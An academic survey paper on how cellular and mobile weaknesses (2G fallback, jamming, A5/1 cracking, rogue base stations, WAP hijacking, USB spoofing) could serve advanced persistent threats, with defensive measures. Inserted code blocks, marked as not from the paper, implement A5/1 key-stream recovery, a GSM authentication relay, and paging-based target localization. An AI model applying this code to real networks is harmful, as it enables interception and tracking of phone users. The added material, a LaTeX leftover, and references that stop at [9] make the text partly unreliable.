How Vulnerabilities in Wireless Networks Can Enable Advanced Persistent Threats




International Journal on Information Technology (IREIT), Vol. xx

Roger Piqueras Jover 1, Paul Giura 1

Abstract. With the tremendous popularity of mobile devices and their increasing adoption in corporate environments, there is a larger opportunity for Advanced Persistent Threats (APTs) to exploit vulnerabilities in wireless and mobility networks. We review several vulnerabilities and successful attacks in this domain and evaluate the possibility of these attacks being used by APTs. Our analysis shows that known attacks in the mobility domain are powerful enough to contribute to the success of an APT operation.

Copyright 2013 Praise Worthy Prize S.r.l. - All rights reserved.

Keywords: Advanced Persistent Threat, Security, Wireless communications

Manuscript received January 2013, revised February 2013.

I. Introduction

Advanced Persistent Threats (APTs) are some of the fastest growing information security threats that organizations face today [1]. They are operated by very skilled and well funded attackers targeting sensitive information from specific organizations. The ultimate goal is to steal intellectual property created from expensive research, to gain access to sensitive customer data, or to access strategic business information that could be used for illegal insider trading or to disrupt an organization's business.

APT can best be defined using the words behind the acronym [2]. Advanced (A) means that attackers are well trained, organized and well funded, and utilize a full spectrum of network intrusion technologies, crafting their own tools if needed. Persistent (P) refers to the persistence of the attack over long periods of time: attackers give high priority to a specific task, rather than opportunistically seeking immediate gain, and maintain a prolonged presence in the compromised organization's networks. Threat (T) refers to the attackers' intention to inflict damage and create loss by disrupting services or stealing proprietary data.

APTs have become very sophisticated and diverse in the methods and technologies used, particularly in the ability to use an organization's own employees to penetrate its IT systems [1]. They are characterized as "low and slow" operations: low for maintaining a low profile in the network and slow for their long execution times. Analyses of specific APT instances conclude that each operation is unique and highly customized for its target ([1], [3]-[5]). Across many operations, however, the stages are similar; they differ mostly in the specific methods used to reach each milestone. Figure 1 shows these stages in the order in which they are typically executed over long periods of time, together with the actions within each stage.

Fig. 1. Typical stages of an APT

Typical security analyses focus on scalable attacks that can target infrastructure, millions of users, etc. Many attacks on cellular networks (e.g. GSM) have not gathered much attention for that reason. With the advent of APTs, however, scale is no longer the issue: the most precise and targeted attacks are the most effective. In this paper we evaluate the possibility of APT operators exploiting known attacks and vulnerabilities in the wireless and mobility domain to accomplish their missions. Our analysis provides useful insight not only for the detection of APTs but also for the forensic investigations that follow the discovery of an attack. To our knowledge, no other study considers the possibility of attackers exploiting vulnerabilities of wireless networks to launch and maintain an APT.

With this work we make the following key contributions:
- We provide a review of relevant recent known attacks in the wireless and mobility domain.

- We assess the possibility that the wireless and mobility attacks can be used to accomplish various actions of a potential APT.
- We recommend a set of preventative measures that organizations should consider in order to reduce the risk of being targets of successful APTs.

The rest of the paper is organized as follows. Section II surveys some of the vulnerabilities of wireless networks and the known attacks exploiting them, Section III shows how these vulnerabilities can be used by APTs, Section IV lists a set of practical measures that can limit the success of APTs, and, finally, Section V presents our conclusions.

II. Vulnerabilities in wireless cellular networks

This section presents an overview of the vulnerabilities and weak points that attackers could exploit in order to prepare, launch and maintain an APT. For example, both data and voice communications could potentially be eavesdropped during the Reconnaissance stage to profile employees. The information obtained in this stage could be used to optimize the crafting of malware and spear-phishing techniques in the Delivery stage. With the deployment of a rogue Base Station (BS), the actual Delivery and Exploitation stages could be implemented. Finally, a wireless terminal connected to the mobility network could potentially be used in the Exfiltration stage, bypassing the enterprise firewall.

II.1. Default fall back to 2G networks

Vulnerability: By design, all cellular networks based on 3GPP standards (i.e. GSM/GPRS/EDGE, UMTS and LTE) fall back to a basic 2G (Global System for Mobile Communications, GSM) connection when connectivity on 3G or beyond cannot be achieved. This can be the result of traffic balancing or because reception on the desired radio band is not possible. In this way, a mobile device can always be online independently of the 3G footprint of a given provider. It is well known that 2G networks are insecure and provide weak encryption [6]. Given the lack of mutual authentication in GSM [7] (the network authenticates the subscriber, but the subscriber has no way to authenticate the network), this fall back can potentially create a security breach. Multiple vulnerabilities that could be exploited in this situation are analyzed in the remainder of this section. In order to attempt different attacks, jamming tools are often applied to force phones to fall back to 2G.

Jamming Attack: Radio jamming is the deliberate transmission of radio signals to disrupt communications by decreasing the signal-to-noise ratio. This attack has been studied in the literature in the context of cellular communications [8]. By means of a radio jammer, an attacker could make a cell phone unable to detect any 3G base station, forcing it to fall back to GSM to access the network [9]. Despite its effectiveness, jamming can potentially be detected, and it requires the attacker either to be in the close vicinity of the victim or to transmit a very large amount of power, which reveals its presence.

Smart Jamming Attack: This technique aims to locally disrupt the communications of a wireless network covertly, raising no alerts. This is done by saturating one or more of the essential control channels required by all mobile devices to access the spectrum. Multiple studies in the literature theoretically demonstrate how to saturate a cellular network by means of, for example, text messages (Short Message Service, SMS) [10] or sustained and periodic set-ups of data connections [11]. Smart jamming is a simpler, more localized attack aimed at the lower layers. It targets the essential control channels shared by all users within a cell, which carry signaling information during the initial access to the system. Saturation of these channels would make the network appear unresponsive and could force a phone to switch to a GSM connection. In addition, given that this attack requires low transmitted power and can be carried out before authentication, detection and mitigation are difficult. This attack has already been demonstrated in the context of GSM networks ([12], [13]) and is theoretically possible on 3G and LTE (Long Term Evolution). A recent report discusses the feasibility of jamming LTE networks in a similar way [14].

II.2. GSM location leaks

Vulnerability: The way cellular networks handle incoming calls leaks information that can be used to locate a device. Upon an incoming connection, the core network attempts to find the mobile station within the area where it was last known to be, the Location Area, identified by its Location Area Code (LAC) [15]. To do so, paging messages are sent over all the cells contained in that Location Area. These paging messages, as well as the responses sent on the Random Access Channel, are not encrypted and can potentially be sniffed by an attacker.

Target Localization Attack: The authors of [16] demonstrate a practical technique to locate a specific target given only its phone number. By triggering incoming connections to that number, sniffing the resulting paging traffic and discarding the locations where the target is not present, it is possible to locate a mobile user at the granularity of a cell. This allows the attacker to locate the victim and proceed to jam that specific cell. Similar techniques are introduced in [17] to locate any device.

II.3. GSM security

Vulnerability: The second generation of wireless networks (2G or GSM) has been in wide use for a very long time. Its security attributes, considered strong at the time of deployment, have been proven vulnerable as technology evolved and allowed attackers to obtain the

necessary tools at low cost. Over the last few years, multiple attacks have exploited such weaknesses.

The three main features of GSM security are: 1) authentication of the subscriber accessing the network, 2) encryption of user data at the radio interface and 3) use of temporary identities for confidentiality [7]. The first two features are based on an individual secret key (K_i) stored in the SIM card of the mobile terminal. Another copy of this key is stored at the network's authentication center. The authentication of the subscriber is performed with a challenge message sent from the network; the phone responds with the result of applying a cryptographic function to the secret key and the challenge. In parallel, a temporary session key (K_c) is derived from the same inputs. This is the key used to encrypt the radio traffic. The subscriber identity (IMSI) is kept secret and is only transmitted over the air on very special occasions; a temporary identity (TMSI) is used for most transactions. The asymmetry of the authentication protocol, which does not require the network to identify itself, makes a Man-in-the-Middle (MitM) attack possible.

II.4. GSM encryption

Vulnerability: A5 is the family of GSM encryption algorithms for the radio interface [7]. It is keyed with the session key K_c described in Section II.3. This 64-bit key is combined with the frame number (22 bits) in order to generate a pseudo-random key stream (114 bits per burst in each direction) that is combined (XOR) with the plaintext message to produce the encrypted message. The family comprises several variants (A5/1, A5/2, A5/3 and A5/0). During the connection and authentication step, the phone and the network agree on which algorithm to use. Note that A5/0 stands for not applying any encryption at all, so, by means of a rogue base station, an attacker could fool a victim into turning off encryption.

GSM Sniffing/Hacking Attack: The A5/1 algorithm has been broken in practice. This allows an attacker to eavesdrop on and decrypt all the traffic a victim generates as well as the traffic it receives. The authors of [6] present a way to break the encryption by means of rainbow tables and obtain the session key. After identifying a victim and its TMSI, the attacker sends a text message to the target device to force it to establish a connection. The attacker then eavesdrops on the handshake between the device and the base station that precedes the delivery of the message. This is a known, largely predictable handshake, so both the plaintext and the encrypted version of several control messages are known; XORing the two yields the key stream of those frames. A lookup in a rainbow table built from key-stream samples provides the session key that was used. Once the session key is obtained, all transactions can be decrypted in real time.

Fig. 2. Man in the Middle attack and Connection Hijacking

Man-in-the-Middle Attack: Many security features of GSM have been defeated over the last few years [18]. As illustrated in Figure 2, an attacker is able to deploy a rogue base station and get target users to attach to it. Given that the authentication protocol is not symmetric, the network is not required to authenticate, so the device believes it is connected to a real Base Station. To achieve a full Man-in-the-Middle (MitM) position, the attacker attempts to access the network claiming the victim's identity. After receiving the challenge message from the network, the attacker forwards it to the victim. The victim's reply, with the correct response, is in turn forwarded to the network. This kind of attack has been discussed in the context of 3G networks as well [19]. Researchers have shown how, by means of a rogue base station, phishing attacks can be launched against a victim in order to obtain all kinds of credentials such as banking information, logins, passwords and other highly sensitive information [20]. In a similar way, malware can be forced onto the device.
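The known-plaintext step of the sniffing attack above, as an added example that is not from the paper or from [6]: a bit-level A5/1 key-stream generator in the register layout of the Briceno/Goldberg/Wagner pedagogical C implementation, followed by the recovery of a frame's key stream from a predictable control message and the candidate-key check that a rainbow-table lookup ends with. The session key, the frame numbers and the fill-pattern control message are constructed sample data, and the table itself is not reproduced, so the "candidate" returned by the lookup is simply the true key here.

```python
# Added example (not from the paper): bit-level A5/1 in the register layout of the
# Briceno/Goldberg/Wagner pedagogical C implementation, plus the known-plaintext
# step that precedes a rainbow-table lookup. Key, frame numbers and the sample
# control message are constructed data.

REGS = (  # (mask, feedback taps, majority-clock bit, output bit) for R1, R2, R3
    (0x07FFFF, 0x072000, 1 << 8, 1 << 18),    # 19 bits, taps 13,16,17,18
    (0x3FFFFF, 0x300000, 1 << 10, 1 << 21),   # 22 bits, taps 20,21
    (0x7FFFFF, 0x700080, 1 << 10, 1 << 22),   # 23 bits, taps 7,20,21,22
)

def _parity(x):
    return bin(x).count("1") & 1

def _step(reg, mask, taps):
    """Shift one LFSR left, feeding back the XOR of its tapped bits."""
    return ((reg << 1) & mask) | _parity(reg & taps)

def a51_keystream(kc, frame):
    """Key stream for one TDMA frame: (network->phone, phone->network), 114 bits each."""
    regs = [0, 0, 0]

    def clock(force_all=False):
        clk = [bool(r & p[2]) for r, p in zip(regs, REGS)]
        majority = sum(clk) >= 2
        for i, (mask, taps, _, _) in enumerate(REGS):
            if force_all or clk[i] == majority:
                regs[i] = _step(regs[i], mask, taps)

    def load(bit):                      # key/frame bits enter at position 0 of every register
        clock(force_all=True)
        for i in range(3):
            regs[i] ^= bit

    for i in range(64):                 # 64-bit Kc, least significant bit of each byte first
        load((kc[i // 8] >> (i & 7)) & 1)
    for i in range(22):                 # 22-bit frame number, LSB first
        load((frame >> i) & 1)
    for _ in range(100):                # mixing, output discarded
        clock()
    out = []
    for _ in range(228):
        clock()
        out.append(_parity(regs[0] & REGS[0][3]) ^ _parity(regs[1] & REGS[1][3])
                   ^ _parity(regs[2] & REGS[2][3]))
    return out[:114], out[114:]

def xor_bits(a, b):
    return [x ^ y for x, y in zip(a, b)]

def pack_bits(bits):
    """MSB-first packing, zero padded (114 bits -> 15 bytes), as the reference test vector uses."""
    out = bytearray((len(bits) + 7) // 8)
    for i, b in enumerate(bits):
        out[i // 8] |= b << (7 - (i & 7))
    return bytes(out)

def encrypt(kc, frame, plaintext_bits, downlink=True):
    """A5/1 in use: plaintext XOR key stream. With A5/0 the key stream would be all zeros."""
    down, up = a51_keystream(kc, frame)
    return xor_bits(plaintext_bits, down if downlink else up)

def recover_keystream(ciphertext_bits, known_plaintext_bits):
    """Known-plaintext step: the attacker predicts a control message and XORs it with
    the sniffed ciphertext; the result is the key stream the table is indexed by."""
    return xor_bits(ciphertext_bits, known_plaintext_bits)

def key_matches(kc_candidate, frame, observed_keystream, downlink=True):
    """Final check after a table hit: does the candidate Kc regenerate the observed stream?"""
    down, up = a51_keystream(kc_candidate, frame)
    return (down if downlink else up) == observed_keystream

# Constructed scenario. 0x2B is the LAPDm fill octet, so a frame made of fill bytes
# is a realistic "known" control message; the session key is the one used by the
# reference implementation's test vector.
KC = bytes.fromhex("1223456789abcdef")
FRAME_KNOWN, FRAME_SECRET = 0x134, 0x135
KNOWN_PLAINTEXT = [int(c) for c in ("00101011" * 15)[:114]]
SECRET_PLAINTEXT = [int(c) for c in ("1101" * 29)[:114]]

def demo():
    """Recover the key stream of a predictable frame, confirm the (here: true) key a
    table lookup would return, and use that key to decrypt a second frame."""
    ks = recover_keystream(encrypt(KC, FRAME_KNOWN, KNOWN_PLAINTEXT), KNOWN_PLAINTEXT)
    if not key_matches(KC, FRAME_KNOWN, ks):
        raise AssertionError("candidate key does not explain the observed key stream")
    return xor_bits(encrypt(KC, FRAME_SECRET, SECRET_PLAINTEXT), a51_keystream(KC, FRAME_SECRET)[0])
```

The two-step structure is the whole point of the attack: the key stream of any frame whose content is predictable (fill frames, System Information) is obtained by a single XOR, and the table only has to map key-stream samples back to K_c. Because K_c is reused for every frame of the session, one hit decrypts everything that follows, which is why a rogue cell that negotiates A5/0 and a passive sniffer with a table end up in the same position.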
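The challenge relay of Figure 2, as an added message-level simulation that is not the paper's code. A3/A8 are replaced by an HMAC-SHA256 stand-in (an assumption; the real functions are operator-specific and irrelevant to the asymmetry being shown), and the IMSI, K_i and class names are constructed.

```python
# Added example (not from the paper): the GSM authentication relay of Figure 2.
# a3_a8() is a constructed HMAC stand-in for the operator-specific A3/A8, and the
# subscriber data is invented.
import hashlib
import hmac
import os

def a3_a8(ki, rand):
    """Toy A3/A8: SRES (32 bits) and Kc (64 bits) from Ki and RAND. Not the real algorithms."""
    d = hmac.new(ki, rand, hashlib.sha256).digest()
    return d[:4], d[4:12]

class AuthenticationCenter:
    """Network side: holds every subscriber's Ki, issues RAND, checks SRES."""
    def __init__(self, subscribers):          # {imsi: ki}
        self.subscribers = subscribers
        self.pending = {}                      # imsi -> (expected SRES, Kc)
        self.sessions = {}                     # imsi -> Kc of authenticated sessions

    def challenge(self, imsi):
        rand = os.urandom(16)
        self.pending[imsi] = a3_a8(self.subscribers[imsi], rand)
        return rand                            # RAND is all that crosses the air interface

    def verify(self, imsi, sres):
        expected, kc = self.pending.pop(imsi)
        if hmac.compare_digest(expected, sres):
            self.sessions[imsi] = kc
            return True
        return False

class Phone:
    """Subscriber side. GSM gives it no way to check who sent the RAND."""
    def __init__(self, imsi, ki):
        self.imsi, self.ki, self.kc, self.cipher = imsi, ki, None, None

    def answer_challenge(self, rand):          # answers any RAND, from any cell
        sres, self.kc = a3_a8(self.ki, rand)
        return sres

    def cipher_mode_command(self, algorithm):  # "A5/1", "A5/3", ... or "A5/0"
        self.cipher = algorithm                # accepted as-is: the command is not authenticated
        return self.cipher

class RogueBaseStation:
    def __init__(self, victim):
        self.victim = victim                   # the phone camped on the rogue cell
        self.kc = None                         # never learned: SRES does not reveal Kc

    def relay_attach(self, auc):
        """Claim the victim's IMSI toward the real network and relay the challenge."""
        rand = auc.challenge(self.victim.imsi)           # network -> rogue BS
        sres = self.victim.answer_challenge(rand)        # rogue BS -> victim -> rogue BS
        return auc.verify(self.victim.imsi, sres)        # rogue BS -> network

    def disable_encryption(self):
        return self.victim.cipher_mode_command("A5/0")   # victim link now in clear

def run_relay():
    """Returns (network accepted the rogue as the victim, cipher forced on the victim,
    Kc known to the rogue, network and victim derived the same Kc)."""
    ki = os.urandom(16)
    auc = AuthenticationCenter({"001010123456789": ki})
    victim = Phone("001010123456789", ki)
    rogue = RogueBaseStation(victim)
    accepted = rogue.relay_attach(auc)
    cipher = rogue.disable_encryption()
    return accepted, cipher, rogue.kc, auc.sessions.get(victim.imsi) == victim.kc
```

Two things the simulation makes explicit that the figure does not. First, the relay gives the attacker a session that the network has authenticated as the victim, but not K_c: toward the network the attacker must still either break A5/1 as in Section II.4 or rely on the network accepting A5/0, while toward the victim it can select A5/0 freely, or skip authentication altogether, since a GSM phone can demand neither. Second, nothing in the exchange lets the phone tell a forged challenge from a relayed genuine one; UMTS AKA adds an AUTN token for that purpose, which stops forged challenges but not the relay of a genuine one.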
II.5. WAP protocol and provisioning

Vulnerability: The Wireless Application Protocol (WAP) defines industry-wide specifications for developing applications that operate over wireless communication networks [21]. It is responsible for initialization and alert messages and defines how PUSH and PULL applications interact with the network. One of the main functions of WAP is provisioning, which defines how a WAP client (the cell phone) is configured for a specific application. In the case of PUSH applications, a special message is sent to the phone informing it that there is content available. This message indicates to the phone the address from which to obtain the content. PUSH messages are also used to display alerts or messages on a phone. Both PUSH and provisioning messages are trusted and acted upon by the phone. Therefore, a malicious provisioning message could tamper with the phone's configuration. Crafting a PUSH message pointing at an address hosting a piece of malware could force an infection onto a phone. Malicious PUSH messages can also, for example, display messages on the screen that fool the user into typing a password.

Connection Hijacking Attack: It has been demonstrated that provisioning messages can be maliciously crafted and sent to a victim from a rogue base station. In this way, an attacker can change the configuration settings of a phone. In particular, it has been shown that the DNS configuration can be tampered with to force connections through a malicious proxy that eavesdrops on and captures all traffic [9]. This attack is also illustrated in Figure 2. Additionally, a spoofed PUSH message can potentially be used to trick a user into installing malware on a phone [9]. Note that, in order to launch this attack, the victim has to be connected to a rogue GSM Base Station.

II.6. Mobility

Vulnerability: A cell phone is, by definition, a mobile terminal that is with the user most of the time. The mobility of such a device enhances the threats to the networks it connects to. In the context of an APT, a cell phone might open the door to attacks that circumvent security barriers such as firewalls (Figure 3). In current scenarios, an attacker trying to gain access to the inside of a corporate network crafts a phishing email very selectively targeted at someone within the organization. Other social engineering techniques are known to be used, such as physical access to the terminals and malware deployment by means of, for example, a USB drive. Mobile terminals present, though, a simpler alternative.

Firewall Circumvention, Malware Deployment and Data Exfiltration Attacks: As described in Section II.5, a user can be fooled into downloading a piece of malicious code without installing any application. This malware can potentially be transferred to any computer to which the phone is physically connected, for example to charge the battery. There are known attacks that aim to exhaust the victim's phone battery [22]; in this way an attacker can force a victim to plug the phone into a computer to charge it. In parallel, a mobile device often creates a bridge between a secured network environment (behind the firewalls) and the outside world (Figure 3). This happens in the case of a mobile phone connected to the Internet via a 3G connection that is, at the same time, connected to a host within the corporate network. Also, a phone is sometimes in a secure (corporate) network and later in a less secure one (home network). Beyond deploying malware, an infected phone can also potentially be used to exfiltrate data. The actual contents of the phone or files from the host computer could be delivered to a server under the attacker's control over WiFi or 3G, using the phone as a bridge to circumvent firewalls.

Fig. 3. Mobility + USB circumventing corporate firewalls

II.7. Voicemail

Vulnerability: Secured access to voicemail accounts is primarily based on a password used for authentication. However, many cellular providers make the voicemail password an optional feature that the user can deactivate, and sometimes the default password is not changed [23]. This could potentially provide an attacker with access to employee information for social engineering.

Voicemail Hacking Attack: The recent News of the World scandal [24] brought mainstream attention to the feasibility of spoofing the caller ID and how this allows attackers to hack into voicemail accounts that have no password or a default one.

II.8. USB interface

Vulnerability: USB has become the universal standard for both data transfer and battery charging in smartphones. In both processes, the phone is physically connected to a computer. The communication over USB is inherently trusted and assumed to be secure. This is mainly due to the physical proximity between the two devices and the fact that it is the user who connects them. The USB protocol has no mechanism to authenticate the device attempting to communicate with the host. This potentially allows an attacker to disguise a device and have it report itself as a different kind of device, such as a USB keyboard, mouse, etc. This trust is known to be often abused in the context of USB pen drives or memory sticks [25]. Known instances of malware exploit weaknesses in the way hosts enumerate and trust newly attached USB devices to deploy a malicious payload on the host.

Malware Transmission Via USB Attack: In [26] the authors demonstrate how these vulnerabilities can be exploited in the context of smartphones. They show that a smartphone connected to a host can claim to be a USB keyboard and send keystrokes. The attacker gains full access to the host under the privileges of the current user. This can potentially be used to install malware or exfiltrate data. Once mounted, the device can also drop any specially crafted media file to exploit the corresponding processing engine. The same authors describe the symmetric attack vector, which allows an attacker to deploy a malicious payload into a mobile device from the computer it is connected to. This exploit, combined with the mobility of a cell phone, allows an attacker to infect a user in a less secure location (home) and the payload to be deployed into the corporate network,

circumventing firewalls (Figure 3).

Fig. 4. Leveraging wireless network vulnerabilities to initiate, maintain and complete an APT

III. APT in Mobility Domain

An APT has a specific target, which could be a person, proprietary data or organization assets. Each of the security incidents and exploitations can occur in a combination of different contexts, and it is precisely this combination of environments that makes the attack very difficult to detect. Entry vectors are often assumed to use wired networks. In this section we show how the attacks described in Section II can be used throughout an APT operation. We assume that the core of the attack, i.e. the Operation and Data Collection stages, must be completed by an attacker from within the corporate network; these stages cannot take advantage of any vulnerability in wireless networks. However, we show that the attacks described in Section II can be leveraged to achieve the remaining steps of the APT.

Based on the model in Figure 1, the intrusion is divided into four stages in the left column of Figure 4. The second column lists the actions and milestones defined for each stage. The attacks analyzed in Section II occupy the remaining columns. The body of Figure 4 indicates which milestones can be reached using each attack. Finally, the arrows indicate one example strategy to launch, maintain and complete an APT operation. Each step is indicated with a shaded rectangle, and the label numbers give the order of the steps, multiple steps being possible for most actions.

III.1. Reconnaissance

In the initial Reconnaissance stage, an attacker could identify and locate a victim by sniffing paging messages and exploiting location leaks (Step 1 in Figure 4). Assuming that the phone has been forced to fall back to GSM (i.e. by jamming, Step 2), an intruder can launch a Man-in-the-Middle attack.
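Step 1 in code form, as an added example that is not from the paper or from [16]: the target's TMSI is isolated by intersecting the TMSIs paged shortly after each attacker-triggered incoming connection, and the cell is then pinned down by looking for the target's uplink response, which, unlike the Location-Area-wide paging, is only seen in the cell the phone is camped on. The sniffer log format, TMSIs, cell names, trigger times and window are all constructed for the example.

```python
# Added example (not from the paper): paging-based target localization (Section II.2,
# Step 1 of Figure 4) over a constructed sniffer log. Log format, TMSIs, cells and
# timings are invented; PAGING_RESPONSE stands for the target's uplink reply.
import re

LOG_LINE = re.compile(r"(?P<t>[\d.]+) cell=(?P<cell>\w+) (?P<msg>\w+) tmsi=(?P<tmsi>0x[0-9a-f]+)")

# Constructed capture: the sniffer sat in cell A for the first three triggers and in
# cell B for the fourth. Background paging of unrelated subscribers is mixed in.
SNIFFER_LOG = """\
10.2 cell=A PAGING tmsi=0x5e2a91c3
10.4 cell=A PAGING tmsi=0x1a2b3c4d
10.9 cell=A PAGING tmsi=0x77ab0012
18.1 cell=A PAGING tmsi=0x0c0ffee0
40.3 cell=A PAGING tmsi=0x1a2b3c4d
40.6 cell=A PAGING tmsi=0x5e2a91c3
41.5 cell=A PAGING tmsi=0x90dd1e55
55.0 cell=A PAGING tmsi=0x77ab0012
70.1 cell=A PAGING tmsi=0x33cc4410
70.8 cell=A PAGING tmsi=0x1a2b3c4d
74.0 cell=A PAGING tmsi=0x5e2a91c3
100.2 cell=B PAGING tmsi=0x1a2b3c4d
100.7 cell=B PAGING_RESPONSE tmsi=0x1a2b3c4d
101.0 cell=B PAGING tmsi=0xabad1dea
"""
TRIGGER_TIMES = [10.0, 40.0, 70.0, 100.0]   # when the attacker placed each silent call
WINDOW = 3.0                                # seconds after a trigger in which its paging is expected

def parse_log(text):
    """Turn sniffer lines into {t, cell, msg, tmsi} records; malformed lines are skipped."""
    events = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if m:
            events.append({"t": float(m["t"]), "cell": m["cell"], "msg": m["msg"], "tmsi": m["tmsi"]})
    return events

def _in_window(t, trigger, window):
    return trigger <= t <= trigger + window

def isolate_target_tmsi(events, triggers, window):
    """TMSIs paged inside the window after *every* trigger. Unrelated paging is
    uncorrelated with the attacker's calls, so it drops out of the intersection."""
    candidates = None
    for trig in triggers:
        paged = {e["tmsi"] for e in events
                 if e["msg"] == "PAGING" and _in_window(e["t"], trig, window)}
        candidates = paged if candidates is None else candidates & paged
    return candidates or set()

def locate_target(events, tmsi, triggers, window):
    """Per observed cell: was the target's response seen after a trigger? Paging is
    sent to every cell of the Location Area, so only the response pins down the cell."""
    seen = {}
    for e in events:
        seen.setdefault(e["cell"], False)
        if (e["msg"] == "PAGING_RESPONSE" and e["tmsi"] == tmsi
                and any(_in_window(e["t"], trig, window) for trig in triggers)):
            seen[e["cell"]] = True
    return seen

def run_localization(text, triggers, window):
    """Full Step 1: (target TMSI, cells where the target answered). Raises if the
    triggers collected so far do not single out one TMSI, i.e. more calls are needed."""
    events = parse_log(text)
    candidates = isolate_target_tmsi(events, triggers, window)
    if len(candidates) != 1:
        raise ValueError(f"{len(candidates)} candidate TMSIs; add more triggers")
    tmsi = next(iter(candidates))
    cells = locate_target(events, tmsi, triggers, window)
    return tmsi, sorted(c for c, hit in cells.items() if hit)
```

With only the first trigger the candidate set still has three entries, which is the usual situation in a busy cell; each extra silent call roughly divides the background set by the fraction of subscribers paged per window, so a handful of triggers suffices. The cell step depends on the TMSI staying stable between triggers and on the sniffer being in the right cell when the response is sent, which is why the attack is run cell by cell, discarding the cells where no response follows.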
The MitM position gives the attacker the ability to extract information for profiling and to scan for potential vulnerabilities of the victim's device (Steps 3 and 4). The encryption of GSM can be broken to listen to calls and read messages, providing further information for profiling the employee. A malicious PUSH or provisioning WAP message can be used to tamper with the DNS configuration of the phone. From that point, all traffic can be re-routed through a malicious proxy controlled by the attacker and information can be extracted [9]. Further social engineering data can be obtained by hacking into the voicemail [23]. These methods potentially allow an attacker to obtain all kinds of information about a set of victims and build a complete profile of them. Once a piece of malware or a rootkit is deployed on the phone, the victim profiles can be completed with extra data such as location information; the malware can potentially turn on the field test mode of the phone to track the location of the set of victims.

III.2. Delivery/Exploitation

Given their mobility, cell phones are a potential platform for infecting terminals within the boundaries of the corporate firewalls with malware. Sections II.6 and II.8 describe how vulnerabilities in the USB protocol can be exploited to transfer a malicious payload from an infected computer at an insecure location to a mobile phone. The infection is then transferred to a corporate machine. Note that known attacks that aim to exhaust the battery of a phone [22] can be added to the equation to force the physical USB connection needed to recharge the phone. A malicious payload can also be forced into the victim's phone by means of a spear-phishing PUSH message or from a rogue base station (Steps 5 and 6 of Figure 4).

Then, exploiting USB vulnerabilities and the inherent mobility of the phone, the malware is transferred into the employee's corporate machine, allowing the attacker to control it (Steps 7 and 8). Finally, diverse access information is obtained by launching multiple attacks (Step 9). The victim is fooled into entering credentials such usernames, token codes, passwords, etc [20]. In parallel, the GSM encryption can be broken so communications can be eavesdropped on the fly or stored for later analysis [6]. The malicious payload in the victim's phone can also be used to exfiltrate information such as contacts, recent called numbers and other data stored in the device. With the stolen credentials, an attacker can gain access to an insider's account. From that initial victim, a further phishing email can be sent to a second victim. This technique could be applied to elevate privileges and move closer to the target. III.3. Exfiltration Finally, because of their inherent mobility, cell-phones can potentially be used as a platform for a sequential exfiltration of targeted data (Steps 11 and 12 in Figure 4). Instead of tunneling the stolen data through firewalls and protected perimeters to some external server, data could be gathered in small pieces by one or multiple phones. These, in turn, forward the chunks of data to an external server either over the 3G connection or over WiFi. To ensure the exfiltration process goes undetected, the phone only uses the employee's home connection. In this way, the actual exfiltration process originates in a less secure location. IV. Preventative Measures Even though some attacks described in Section II are difficult to detect, certain preventative measures can be taken to minimize the probability of exploitation. We propose a few items that organizations should consider that have the potential to raise the bar for APTs and can help forensic investigations. 
Personal/work device policy: It is difficult to enforce a policy to avoid the use of personal devices. A simpler policy, though, can be enforced for cell-phone usage in work environments. For example, work devices can only be synched at workstations and, while at home, they can only be charged by plugging into the outlet. Conversely, personal phones can only be synched at home and, while at work, they can only be charged by plugging into the outlet. In this way, firewall circumvention via mobile devices would not be possible. Enable 2G ON/OFF switch: As long as GSM networks remain active, the threats described in Section \ref{sec:attacks} will be present. However, the possibility of turning off 2G on a phone would be very beneficial to overcome 2G limitations. Forcing all the traffic of an employee's work phone to be transmitted on 3G would make it impossible for an attacker to launch certain attacks. While most phones allow a user to disable 3G, such functionality is not typically available for disabling 2G. We have developed a prototype app to allow a user to manually disable GSM 2G. Enforce voicemail password: The enforcement of a password for employee's voice mail is a simple and effective measure that can help prevent voicemail hacking. Enable wireless data monitoring: Monitoring closely data traffic generated over cellular networks has the potential to reveal some of the malicious activities that a device might be involved in, such as malware download, data exfiltration or leaking of location information. Mobility data should be added to the set of environments monitored by corporations for security and forensic investigation purposes. The APT detection mechanisms should look for signs of attacks by considering broader contexts around possible targets, such as proprietary data servers, high profile employees, critical assets, etc. 
TABLE I
ATTACK MITIGATION MEASURES

Attacks | Policy | 2G OFF | VM-Pwd | Monitor
Jamming (II-A): X
Location (II-B): (no measure)
MitM (II-C): X X
GSM Sniff (II-D): X X
Hijacking (II-E): X X
Mobility (II-F): X X
Voicemail (II-G): X X
USB (II-H): X X

Table I indicates, with an X, which attacks from Section II can be avoided or mitigated by each preventative measure (device policy, 2G OFF switch, voicemail password, wireless data monitoring). Note that no measure in the table covers Location (II-B): paging messages can still be sniffed, which allows a mobile phone to be located.

V. Conclusions

This research has reviewed several wireless network and mobility vulnerabilities and has evaluated how known attacks could be exploited by an APT operation. Our study shows that the attacks surveyed have the potential to initiate and sustain an APT operation by providing several information-gathering opportunities in the Reconnaissance stage, malware deployment in the Delivery/Exploitation stage, and silent export of data from within the enterprise network in the Exfiltration stage. Additionally, we propose a set of preventative measures that enterprises can use to detect and address some of the vulnerabilities and attacks presented. In future work we seek to identify quantitative methods for assessing the APT risk that the increasing use of mobile devices brings to enterprise environments.

References

[1] RSA, RSA Security Brief: Mobilizing Intelligent Security Operations for Advanced Persistent Threats, http://tinyurl.com/6n6rqfp, February 2011.
[2] P. Giura and W. Wang, Using Large Scale Distributed Computing to Unveil Advanced Persistent Threats, Academy of Science and Engineering Science Journal, vol. 1, no. 3, December 2012, pp. 93-105.
[3] B. Krekel, G. Bakos, and C. Barnett, Capability of the People's Republic of China to conduct cyber warfare and computer network exploitation, The US-China Economic and Security Review Commission, Washington, DC, Research Report, 2009.
[4] Damballa, The Command Structure of the Aurora Botnet, http://www.damballa.com/research/aurora/, March 2010.
[5] SANS Technology Institute, Assessing Outbound Traffic to Uncover Advanced Persistent Threat, http://tinyurl.com/65sg29s, May 2011.
[6] K. Nohl and S. Munaut, Wideband GSM sniffing, In 27th Chaos Communication Congress, 2010, http://tinyurl.com/33ucl2g.
[7] G. Horn, D. Forsberg, W. Moeller, and V. Niemi, LTE Security (John Wiley & Sons, 2010).
[8] W. Xu, Y. Zhang, and T. Wood, The feasibility of launching and detecting jamming attacks in wireless networks, In ACM MOBIHOC, 2005, pp. 46-57.
[9] C. Mune, R. Gassira, and R. Piccirillo, Hijacking mobile data connections, In BlackHat Europe, 2009, http://tinyurl.com/7b2gvdg.
